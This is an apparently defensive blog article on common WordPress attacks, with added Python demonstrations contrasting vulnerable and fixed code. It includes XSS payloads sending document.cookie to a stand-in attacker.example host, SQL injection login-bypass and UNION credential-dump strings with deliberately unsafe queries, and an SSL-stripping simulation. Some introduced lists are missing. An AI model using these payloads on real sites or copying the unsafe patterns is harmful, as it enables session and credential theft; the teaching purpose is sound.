Imagine yourself shouting this text as loud as you can.
Everything you worked on: your content, your witty jokes, your well-selected images.
And the visitors to your site, your potential customers, don’t see any of the content you spent so much time and money on. Instead they see “HACKED BY GHOST 2945, COURTESY OF IDIOT SECURITY”.
In this article, we’ll look at the dangers facing your WordPress website(s), and some solutions designed to help you avoid the scenario we just described.
WordPress is, by far, the most popular CMS on the internet – it powers 43% of all websites. While this makes for a great community, it also paints a giant target on our backs. According to the Arishi agency, WordPress websites are attacked 90,000 times a minute*.
There are several reasons for WordPress’s vulnerability:
So let’s look at some of the most common attacks on WordPress websites:
Cross-site scripting (XSS) is the most common form of attack on WordPress sites. In an XSS attack, hackers get their own script into a page that your site serves, so that it runs in your visitors’ browsers with your site’s identity. In a reflected XSS attack the script travels in a crafted link or form submission and is echoed straight back in the response to whoever sent it; in a stored XSS attack it is saved into the website’s database (a comment, a profile field, a plugin setting) and served to every visitor who loads the affected page.
XSS attacks can take several forms:
Reflected and stored are two ends of the same bug: input that is written into a page without being escaped. Where the input is merely echoed, only the visitor who clicked the crafted link is hit; where your site saves it, the same payload becomes a stored XSS attack on all your website’s visitors.
Script running inside a visitor’s browser can read whatever that visitor sees and types, steal their session cookie and impersonate them (including a logged-in administrator, which is how an XSS bug turns into a site takeover), redirect them to scam sites, or put their browser to work for the attacker. The fix is the same in every case: escape every piece of untrusted data at the point where it is written into HTML. In WordPress code that means esc_html(), esc_attr() and esc_url(), depending on where the data lands.
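To make the difference concrete, here is an added example (not code from the article, and written in Python rather than WordPress’s PHP so that it runs stand-alone): a tiny page renderer that reflects a search term and displays stored comments, once without escaping and once with it. The attacker payloads and the attacker.example domain are constructed for the demonstration.

```python
import html
import re

# Constructed sample inputs (not taken from the article): a search term supplied
# in the URL, which the page reflects back, and a comment saved to the database,
# which the page shows to every visitor.
SEARCH_TERM = '<script>location="https://attacker.example/?c="+document.cookie</script>'
STORED_COMMENT = "<img src=x onerror=\"fetch('https://attacker.example/steal?c='+document.cookie)\">"

# A raw <script> or <img> start tag in the output means the browser will run it.
ACTIVE_TAG_RE = re.compile(r"<\s*(script|img)\b", re.IGNORECASE)


def render_vulnerable(search_term: str, comments: list[str]) -> str:
    """Build the page the way a careless template does: raw string concatenation.
    The search term comes back verbatim (reflected XSS); each comment came from
    the database and is echoed to everyone who loads the page (stored XSS)."""
    page = f"<h1>Results for {search_term}</h1>\n"
    for comment in comments:
        page += f"<p class='comment'>{comment}</p>\n"
    return page


def render_safe(search_term: str, comments: list[str]) -> str:
    """Same page, but every untrusted string is HTML-escaped at output time.
    html.escape() turns < > & " ' into entities, so the browser displays the
    attacker's text instead of executing it. WordPress's esc_html() does the
    same job inside a theme or plugin."""
    page = f"<h1>Results for {html.escape(search_term)}</h1>\n"
    for comment in comments:
        page += f"<p class='comment'>{html.escape(comment)}</p>\n"
    return page


def contains_active_content(page: str) -> bool:
    """Crude check used to make the difference visible: is there a live
    <script> or <img ...> tag in the rendered HTML that the template itself
    did not put there? (The template only emits <h1> and <p>.)"""
    return ACTIVE_TAG_RE.search(page) is not None


if __name__ == "__main__":
    comments = [STORED_COMMENT]
    print(contains_active_content(render_vulnerable(SEARCH_TERM, comments)))  # True
    print(contains_active_content(render_safe(SEARCH_TERM, comments)))        # False
    print(render_safe(SEARCH_TERM, comments))
```

The escaping happens at output, not at input: a comment that is stored exactly as the visitor typed it is harmless as long as every place that prints it escapes it for the context it is printed into.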
SQL injection attacks are the second most common form of attack on WordPress sites and are particularly dangerous. Like XSS attacks, they work by smuggling attacker-written code into your site through ordinary input. The difference is where that code ends up running: XSS runs in your visitors’ browsers, while SQL injection runs inside your database.
WordPress websites are built on a SQL database (MySQL or MariaDB). All your posts, pages, users, settings and image metadata are stored in it. Most WordPress sites are generated dynamically, which means that when visitors come to your site, WordPress queries the database and constructs the webpage on the fly.
It’s this back and forth between the site and the database that leaves you vulnerable to SQL injection: whenever a value that came from a visitor (a search term, a form field, a URL parameter) is pasted into the text of a query instead of being passed as a bound parameter, that visitor gets to write part of the query.
Similar to XSS attacks, SQL injection attacks can take several forms:
Once attacker-controlled text reaches the database as part of a query, the attacker can run commands with whatever privileges the site’s database account has, and on a typical WordPress install that is full read and write access to every table: the same access the website owner has.
These attacks are generally aimed at exfiltrating (downloading) data from your server: usernames, password hashes (which are then cracked offline), customer details, order records and anything else the site stores. A write-capable injection can also be used to redirect users to scam websites by editing the site URL and plugin settings in the wp_options table, or to add a new administrator account to wp_users as a permanent back door.
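An added example, not code from the article: the login-bypass and credential-dump injections run against a constructed wp_users table, with Python’s sqlite3 standing in for MySQL so that it runs without a database server, next to the parameterised query that closes the hole.

```python
import sqlite3

# sqlite3 stands in for the MySQL/MariaDB database behind a WordPress site; the
# injection works the same way. The rows are constructed for the example, and
# the passwords are stored in clear only to keep the demo short (WordPress
# stores hashes, which an attacker would still dump and crack offline).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO wp_users VALUES (?, ?, ?)",
        [("admin", "correct-horse-battery-staple", "administrator"),
         ("editor", "hunter2", "editor")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """The bug: visitor input is pasted into the SQL text, so the attacker's
    quotes and keywords become part of the query the database executes."""
    sql = ("SELECT user_login, role FROM wp_users "
           f"WHERE user_login = '{username}' AND user_pass = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """The fix: a parameterised query. The SQL text is fixed; the values travel
    separately and can never change the query's structure. In WordPress code
    the equivalent is $wpdb->prepare()."""
    sql = "SELECT user_login, role FROM wp_users WHERE user_login = ? AND user_pass = ?"
    return conn.execute(sql, (username, password)).fetchone()


def profile_vulnerable(conn: sqlite3.Connection, username: str):
    """A harmless-looking profile lookup with the same flaw; with a UNION the
    attacker turns it into a dump of every credential in the table."""
    sql = f"SELECT user_login, role FROM wp_users WHERE user_login = '{username}'"
    return conn.execute(sql).fetchall()


# Classic payloads. "-- " starts a SQL comment, so everything after it (the
# password check, the closing quote) is discarded by the database.
BYPASS_USERNAME = "admin'-- "
DUMP_USERNAME = "x' UNION SELECT user_login, user_pass FROM wp_users-- "

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS_USERNAME, "wrong"))   # ('admin', 'administrator')
    print(login_safe(db, BYPASS_USERNAME, "wrong"))         # None
    print(profile_vulnerable(db, DUMP_USERNAME))            # every login and password
```

Note that the safe version does not try to filter or "clean" the username; it simply never lets the value become SQL. Escaping by hand is where most hand-rolled fixes go wrong.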
Brute force attacks are as old as passwords, but cheap automated tools and botnets made them routine. As their name implies, these bots simply try millions of username and password combinations against your login page (wp-login.php) and the XML-RPC interface (xmlrpc.php), hoping to land on an account with administrator permissions. If they crack an administrator’s credentials, they gain complete control of your site. The defence is equally basic: long, unique passwords, two-factor authentication, and locking out any address that keeps failing.
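As an added example (not part of the article), here is the detection a site owner or host can run over the web server’s access log: count failed login POSTs per source address in a sliding window and report the addresses that should be locked out. The log lines, addresses and timestamps are constructed for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed access-log lines in the common "combined" layout (not real traffic).
# WordPress answers a failed login POST to wp-login.php with a 200 (the form
# again) and a successful one with a 302 to wp-admin, so the status code tells
# failures from successes. One address fires twelve attempts in twelve seconds;
# a human gets the password wrong once and then logs in.
BOT, HUMAN = "203.0.113.7", "198.51.100.23"
LOG_LINES = [
    f'{BOT} - - [10/Mar/2023:09:00:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3124 "-" "python-requests/2.28"'
    for s in range(1, 13)
] + [
    f'{HUMAN} - - [10/Mar/2023:09:00:05 +0000] "POST /wp-login.php HTTP/1.1" 200 3124 "-" "Mozilla/5.0"',
    f'{HUMAN} - - [10/Mar/2023:09:00:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    f'{HUMAN} - - [10/Mar/2023:09:00:21 +0000] "GET /wp-admin/ HTTP/1.1" 200 9021 "-" "Mozilla/5.0"',
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATHS = {"/wp-login.php", "/xmlrpc.php"}   # xmlrpc.php is the other common target


def parse_line(line: str):
    """Pull out the fields we need; returns None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def find_brute_forcers(lines, threshold: int = 10, window: timedelta = timedelta(minutes=1)) -> dict:
    """Sliding-window count of failed login POSTs per source address.
    Returns {ip: peak number of failures seen inside one window} for every
    address that reached the threshold; these are the addresses to lock out."""
    recent: dict[str, deque] = defaultdict(deque)
    flagged: dict[str, int] = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["method"] != "POST" or ev["path"] not in LOGIN_PATHS:
            continue
        if ev["status"] != 200:          # 302 = login succeeded, not a failure
            continue
        q = recent[ev["ip"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()                  # drop failures older than the window
        if len(q) >= threshold:
            flagged[ev["ip"]] = max(flagged.get(ev["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    print(find_brute_forcers(LOG_LINES))   # {'203.0.113.7': 12}
```

The threshold and window are the knobs a lockout plugin or a fail2ban jail exposes; ten failures in a minute is far beyond anything a human produces, so it catches the bot without locking out the person who mistyped once.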
Man-in-the-middle attacks actually describe a wide variety of different attacks. It’s basically any attack where the visitor thinks they are communicating with your website, but their traffic is passing through, and being read or altered by, a hacker sitting between them and your server. Here we’ll talk specifically about HTTP man-in-the-middle attacks.
When the web was first developed, sites were served over plain HTTP, which anyone on the network path (the coffee-shop Wi-Fi, a compromised router) can read and modify. Because of those security concerns, a new protocol became the standard: HTTPS (the “s” is for “secure”), which wraps the same traffic in TLS encryption so that it can be neither read nor altered in transit. To make sure people who type or follow an old http:// address still end up at the correct site, almost all sites answer a plaintext HTTP request with a redirect to the equivalent HTTPS page. However, that first plaintext request is exactly the opportunity a hacker needs: if they can intercept it, they can answer it themselves, keep the visitor on an unencrypted connection, and quietly read or rewrite everything that follows, including the login form.
On WordPress sites the redirect is often handled by a plugin rather than by the web server, and a plugin that controls where visitors are sent is a natural target: if it is outdated or vulnerable, hackers can hijack the redirect and send users to scam sites instead.
In 2019, Wordfence reported a vulnerability in one such redirect plugin that was installed on over 70,000 websites.
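The interception described above is known as SSL stripping, and the defence on the site’s side is the HTTP Strict Transport Security (HSTS) header. This added simulation (not code from the article, and not the plugin case Wordfence reported) models the three parties in Python so the sequence can be run and inspected: a site that redirects to HTTPS and sends HSTS, an on-path attacker that swallows the redirect, and a browser that remembers HSTS. The host example.com and the page content are placeholders.

```python
from urllib.parse import urlsplit, urlunsplit

HSTS = "strict-transport-security"


class Site:
    """Stand-in for your web server. A plaintext request gets the usual 301 to
    the https:// address; the https page carries an HSTS header when enabled."""

    def __init__(self, host: str, hsts: bool = False):
        self.host, self.hsts = host, hsts

    def handle(self, url: str):
        parts = urlsplit(url)
        if parts.scheme == "http":
            return 301, {"location": urlunsplit(("https",) + parts[1:])}, ""
        headers = {HSTS: "max-age=31536000; includeSubDomains"} if self.hsts else {}
        return 200, headers, f"<a href='https://{self.host}/wp-login.php'>Log in</a>"


class StrippingAttacker:
    """An on-path attacker (the coffee-shop Wi-Fi, say). It cannot read TLS, so
    https requests pass through untouched. A plaintext request, though, it can
    answer itself: it follows the site's redirect over https, then hands the
    victim a plaintext copy with every https:// link rewritten to http:// and
    the HSTS header removed."""

    def __init__(self, site: Site):
        self.site = site

    def handle(self, url: str):
        if urlsplit(url).scheme == "https":
            return self.site.handle(url)
        status, headers, body = self.site.handle(url)
        if status == 301:
            status, headers, body = self.site.handle(headers["location"])
        headers = {k: v for k, v in headers.items() if k != HSTS}
        return status, headers, body.replace("https://", "http://")


class Browser:
    """Minimal HSTS-aware client. Hosts in hsts_hosts are upgraded to https
    before any request leaves the machine, so the plaintext hop never happens."""

    def __init__(self, preload=()):
        self.hsts_hosts = set(preload)   # real browsers also ship a preload list

    def fetch(self, url: str, network, max_redirects: int = 3):
        for _ in range(max_redirects + 1):
            parts = urlsplit(url)
            if parts.scheme == "http" and parts.hostname in self.hsts_hosts:
                url = urlunsplit(("https",) + parts[1:])
                parts = urlsplit(url)
            status, headers, body = network.handle(url)
            if parts.scheme == "https" and HSTS in headers:
                self.hsts_hosts.add(parts.hostname)   # remember: https only from now on
            if status == 301:
                url = headers["location"]
                continue
            return url, body
        raise RuntimeError("too many redirects")


if __name__ == "__main__":
    site = Site("example.com", hsts=True)
    attacker = StrippingAttacker(site)

    # First-ever visit, through the attacker: no HSTS yet, the redirect is
    # swallowed and the visitor stays on plaintext with a plaintext login link.
    print(Browser().fetch("http://example.com/", attacker))

    # Returning visitor who once reached the site directly: the browser
    # remembers HSTS, upgrades before sending, and the attacker sees only TLS.
    returning = Browser()
    returning.fetch("http://example.com/", site)
    print(returning.fetch("http://example.com/", attacker))
```

The simulation shows the header’s limit as well as its value: a visitor whose very first connection goes through the attacker never receives it. That first-visit gap is what the browser preload list (the `preload` directive, submitted to hstspreload.org) closes, and it only makes sense once every page on the site is served over HTTPS.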
DDoS (distributed denial of service) attacks are one of the oldest types of attack on the internet. Imagine you have a site that normally gets 1,000 visitors an hour. Now, imagine that suddenly a million visitors an hour are trying to load your site’s pages. Server resources are strained and pages take forever to load, lowering your site’s performance and user experience, which can negatively impact SEO rankings and discourage potential customers.
So where do these millions of visitors come from? They are botnets: large numbers of compromised computers, servers and internet-connected devices under one attacker’s control, all requesting your pages over and over again with the clear intent of taking down your server and chasing away your human visitors. And to tie it all together, those botnets are often assembled from machines compromised using one of the other types of attacks outlined above.
There are a number of motivations for DDoS attacks:
SEO stands for Search Engine Optimization; essentially it’s the way search engines find and rank sites on the web.
SEO spam attacks are quite insidious. They are very hard to detect but can wreck your site’s standing in search results. In an SEO spam attack, once hackers have control of your site (via one of the methods described above), they quietly fill it with links to a scam site, typically hidden where a human visitor will never notice them: in off-screen or display:none blocks, in the footer of every page, or on pages served only to search-engine crawlers.
This boosts the scam site’s ranking, but it is a form of link manipulation that search engines treat as abuse, so once they detect it (and notice that your site is linking to a scam site) they’ll penalize you. This means people searching for sites like yours may never see it.
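Here is an added check for exactly this, not code from the article: a scanner that parses a page’s HTML and reports links to other domains that sit inside elements hidden from human visitors. The sample page and the spam domains (on the reserved .example TLD) are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Inline styles that make an element invisible to a human but not to a crawler.
HIDING_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|font-size\s*:\s*0(?:px)?\s*(?:;|$)"
    r"|(?:left|top|text-indent)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
VOID_TAGS = {"br", "hr", "img", "input", "meta", "link"}   # never have a closing tag


class HiddenLinkFinder(HTMLParser):
    """Walk the HTML and record every link to another domain that sits inside
    an element hidden by inline style or the `hidden` attribute."""

    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.hidden_depth = 0     # > 0 while inside a hidden element
        self.open_hidden = []     # per open tag: did it start a hidden region?
        self.findings = []

    def _is_outbound(self, href: str) -> bool:
        host = urlsplit(href).hostname
        return bool(host) and host != self.site_host and not host.endswith("." + self.site_host)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hides = "hidden" in a or bool(HIDING_STYLE_RE.search(a.get("style") or ""))
        if tag not in VOID_TAGS:
            self.open_hidden.append(hides)
            if hides:
                self.hidden_depth += 1
        if tag == "a" and a.get("href") and self.hidden_depth and self._is_outbound(a["href"]):
            self.findings.append(a["href"])

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.open_hidden and self.open_hidden.pop():
            self.hidden_depth -= 1


def find_hidden_outbound_links(html_text: str, site_host: str) -> list:
    """Return the hrefs of hidden links pointing off-site, in document order."""
    finder = HiddenLinkFinder(site_host)
    finder.feed(html_text)
    return finder.findings


# Constructed page: a normal post with one visible external link, plus the kind
# of block an SEO-spam infection appends to every page, pushed off-screen.
SAMPLE_HTML = """
<html><body>
  <h1>My bakery</h1>
  <p>Read our <a href="/about/">story</a> or visit <a href="https://wordpress.org/">WordPress.org</a>.</p>
  <img src="/cake.jpg" alt="cake">
  <div style="position:absolute; left:-9999px; top:0">
    <a href="https://cheap-pills.example/buy">buy cheap pills online</a>
    <a href="https://casino-bonus.example/">best casino bonus</a>
    <a href="https://example.com/menu/">menu</a>
  </div>
  <span hidden><a href="https://payday-loans.example/">payday loans</a></span>
</body></html>
"""

if __name__ == "__main__":
    for href in find_hidden_outbound_links(SAMPLE_HTML, "example.com"):
        print("hidden outbound link:", href)
```

Run it over the HTML as a crawler sees it, not just what your browser shows: spam that is cloaked (served only when the User-Agent is a search-engine bot) will not appear in a normal fetch, so also fetch pages with a Googlebot User-Agent or compare against what Search Console’s URL inspection reports. Links hidden through an external stylesheet rather than an inline style will also slip past this scanner, so treat a clean result as a quick triage, not a bill of health.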
There are a number of basic, but critical, steps you can take to defend yourself from these attacks:
The internet has provided unprecedented opportunities for businesses to reach potential customers, but along with that they are exposed to criminals around the world. And while large companies and organizations are doing their best to make the internet safe, ultimately it’s up to you, the website owner, to stay safe.
*Yes I know the number seems ridiculous, but keep in mind that today’s hackers are using automated tools and bots that are constantly attacking, probing and looking for weaknesses.